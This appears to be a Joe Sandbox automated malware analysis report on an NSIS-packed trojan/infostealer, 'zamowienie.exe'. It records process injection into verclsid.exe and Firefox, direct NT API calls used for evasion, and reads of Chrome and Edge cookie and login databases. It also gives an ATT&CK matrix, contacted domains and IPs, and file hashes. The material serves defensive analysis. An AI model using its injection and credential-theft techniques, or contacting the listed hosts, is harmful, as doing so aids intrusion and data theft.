    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F2D0 mov eax, dword ptr fs:[00000030h]3_2_34F1F2D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF92C5 mov eax, dword ptr fs:[00000030h]3_2_34EF92C5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF92C5 mov eax, dword ptr fs:[00000030h]3_2_34EF92C5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov eax, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov eax, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov ecx, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov ecx, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F872A0 mov eax, dword ptr fs:[00000030h]3_2_34F872A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F872A0 mov eax, dword ptr fs:[00000030h]3_2_34F872A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2329E mov eax, dword ptr fs:[00000030h]3_2_34F2329E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2329E mov eax, dword ptr fs:[00000030h]3_2_34F2329E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5283 mov eax, dword ptr fs:[00000030h]3_2_34FC5283
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F31270 mov eax, dword ptr fs:[00000030h]3_2_34F31270
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F31270 mov eax, dword ptr fs:[00000030h]3_2_34F31270

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtOpenSection: Direct from: 0x76EF2E0C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQueryValueKey: Direct from: 0x76EF2BEC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtCreateFile: Direct from: 0x76EF2FEC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtOpenFile: Direct from: 0x76EF2DCC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtCreateMutant: Direct from: 0x76EF35CC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtResumeThread: Direct from: 0x76EF36AC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtTerminateThread: Direct from: 0x76EE7B2E
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtReadFile: Direct from: 0x76EF2ADC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtDelayExecution: Direct from: 0x76EF2DDC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtResumeThread: Direct from: 0x76EF2FBC
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtCreateUserProcess: Direct from: 0x76EF371C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtOpenKeyEx: Direct from: 0x76EF3C9C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtSetInformationThread: Direct from: 0x76EE63F9
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtClose: Direct from: 0x76EF2B6C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtSetInformationThread: Direct from: 0x76EF2B4C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe NtCreateKey: Direct from: 0x76EF2C6C
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: read write
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\verclsid.exe Thread register set: target process: 6164
    Source: C:\Windows\SysWOW64\verclsid.exe Thread APC queued: target process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
    Source: C:\Users\user\Desktop\zamowienie.exe Process created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
    Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034F1

    Stealing of Sensitive Information

    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
    Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\verclsid.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 11 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 4 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    [Behavior graph, ID 1539242: sample zamowienie.exe, start date 22/10/2024, architecture WINDOWS, score 92. Process chain: zamowienie.exe -> zamowienie.exe -> dmQRVBQMPL.exe (injected) -> verclsid.exe -> dmQRVBQMPL.exe (injected) and firefox.exe.]

    Source | Detection | Scanner | Label | Link
    zamowienie.exe | 5% | ReversingLabs | Win32.Trojan.Sonbokli |
    zamowienie.exe | 100% | Avira | HEUR/AGEN.1361137 |

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll | 0% | ReversingLabs | |

    No Antivirus matches
    No Antivirus matches

    Source | Detection | Scanner | Label | Link
    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
    http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
    http://nsis.sf.net/NSIS_Error | 0% | URL Reputation | safe |
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.3808.app | United States | 16509 | AMAZON-02US | false
195.110.124.133 | nutrigenfit.online | Italy | 39729 | REGISTER-ASIT | false
185.17.43.223 | kambud.biz | Poland | 197155 | ARTNETPL | false
199.59.243.227 | www.gold-rates.online | United States | 395082 | BODIS-NJUS | false
194.58.112.174 | www.svarus.online | Russian Federation | 197695 | AS-REGRU | false
3.33.130.190 | yourwebbuzz.net | United States | 8987 | AMAZONEXPANSIONGB | false
216.40.34.41 | www.newhopetoday.app | Canada | 15348 | TUCOWSCA | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539242
Start date and time: 2024-10-22 13:25:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zamowienie.exe
Detection: MAL
Classification: mal92.troj.spyw.evad.winEXE@7/15@8/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 105
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: zamowienie.exe
Time | Type | Description
07:28:02 | API Interceptor | 2421579x Sleep call for process: verclsid.exe modified
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38
                                                                                                                                            Entropy (8bit):4.240962710641208
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:XBjBc3PEf0OAky:W88vky
                                                                                                                                            MD5:A0D91A2F9ACB4DEC3B5260ABA27839C4
                                                                                                                                            SHA1:8A9037C691A2BDEEBCAB8BF3D4C954E62ACA9207
                                                                                                                                            SHA-256:773CD6FBA7D53550B4C41AA889E330B744A7A579DF2BB02212773B67E72F5844
                                                                                                                                            SHA-512:D3DF7852AEA197E901C787CD8D943FAAA30EE9A6678C4853ED0BB494679897854E4E7556F420F1C176443A485CF1E02E0B4BFF86F8DA4017A053362B2C9A0608
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:[Landslide]..conduits=jazzorkesteret..
                                                                                                                                            Process:C:\Windows\SysWOW64\verclsid.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):196608
                                                                                                                                            Entropy (8bit):1.121297215059106
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2753129
                                                                                                                                            Entropy (8bit):2.331545552838218
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:Zo4i+RNMONxD8JxqR+UfGn3X8TEN8NdMk8yPAudY6ku1v39LH+FrA7jiwVoxTQG7:7BkdcGn6ENcVVlY+1eMKFQClJRj4e
                                                                                                                                            MD5:EAA864507F12C17D24AA61C6878628DE
                                                                                                                                            SHA1:7A37435E42CE441E45C409E2CBC12A5BA3E50F7F
                                                                                                                                            SHA-256:9ABD825EE8A302DD1A5EE8FA8B70CEA24B15AB8224115EB2333F819F4318F1EB
                                                                                                                                            SHA-512:221CA014348DE8D5914C3CBFF8AC94660E8FC48EED455730109C74A0F6C6604E94A4D66E5FF30CC0F8655EAF97AF9670B87B262C41BC8A512089F63F06145DB2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.744994954995265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                                                                                                                            MD5:12B140583E3273EE1F65016BECEA58C4
                                                                                                                                            SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                                                                                                                            SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                                                                                                                            SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Udspecialiser45.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Botulismus56.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Hebdomcad.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):337930
                                                                                                                                            Entropy (8bit):1.25188824584269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:hJMwrC9wmaLL8pC4j2hVlttk0orKQD2tutLZ6x/FpL/78Z9UeF2uzUrLMZmJw2ev:tBViuRS6HyF8/vBo+9L/v5s
                                                                                                                                            MD5:C6D1C2BE55D88953114534B2C3414FCE
                                                                                                                                            SHA1:4CE94B31CE73032CF27185052078645BF0AE3150
                                                                                                                                            SHA-256:2CAAE3F8077BF3A599CA5F8CE790CB1CE8E5DFCDC85F9D355D24A767C05DC21C
                                                                                                                                            SHA-512:B404301D95A3BB60D59483A596B38B9E1D02DCA69B4FAC424A33D316F077A1D55D2A45BC3D298E063E0F2D10ADF7F1F38E4202382B69CF3CB57F9CFD1007C300
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):102287
                                                                                                                                            Entropy (8bit):4.602402179232247
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:m6JZRAi/JRATh3qtEptdq3VIf31jdIXUM9CmO1k6c/h:ZrAMJRATsYtdiwVoh
                                                                                                                                            MD5:C55446B1BF3CC22503E46F1E6E45347D
                                                                                                                                            SHA1:7AB3F441EC208BD5B4CD2AEEBB63012CC91CF55C
                                                                                                                                            SHA-256:EB2BB2F8FF36504CD79F6DE36F638B31A0BB23A7F1B4D3A1647386CD1063891D
